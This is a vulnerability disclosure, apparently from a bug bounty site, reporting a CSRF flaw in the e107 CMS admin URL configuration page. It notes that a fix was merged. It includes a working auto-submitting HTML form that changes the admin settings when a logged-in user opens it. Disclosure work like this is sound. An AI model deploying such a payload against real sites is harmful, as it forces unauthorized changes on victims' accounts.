Cross-Site Request Forgery (CSRF) in e107inc/e107

Valid

Reported on

Sep 13th 2021


✍️ Description

Attacker or malicious user is able to change URL configuration if a logged in user visits attacker website. because lack of CSRF token

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser
2.you can check unintentionally your search URL changed form /search.php to /search/


//POC.html
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="http://localhost:8181/ecms-full/e107_admin/eurl.php?mode=main&action=config" method="POST">
     <input type="hidden" name="eurl_config[index]" value="core" />
     <input type="hidden" name="eurl_config[news]" value="core" />
     <input type="hidden" name="eurl_config[page]" value="core" />
     <input type="hidden" name="eurl_config[search]" value="core" />
     <input type="hidden" name="eurl_config[system]" value="core" />
     <input type="hidden" name="eurl_config[user]" value="core" />
     <input type="hidden" name="update" value="Update" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>

💥 Impact

This vulnerability is capable of forcing user to unintentional change social settings

💥 Test

Tested version is 2.3 on Firefox and safari.

💥 Fix

You should set a CSRF token on this requeset.

References

We have contacted a member of the e107inc/e107 team and are waiting to hear back 3 months ago
Cameron confirmed that a fix has been merged on 2682ae 3 months ago
Cameron has been awarded the fix bounty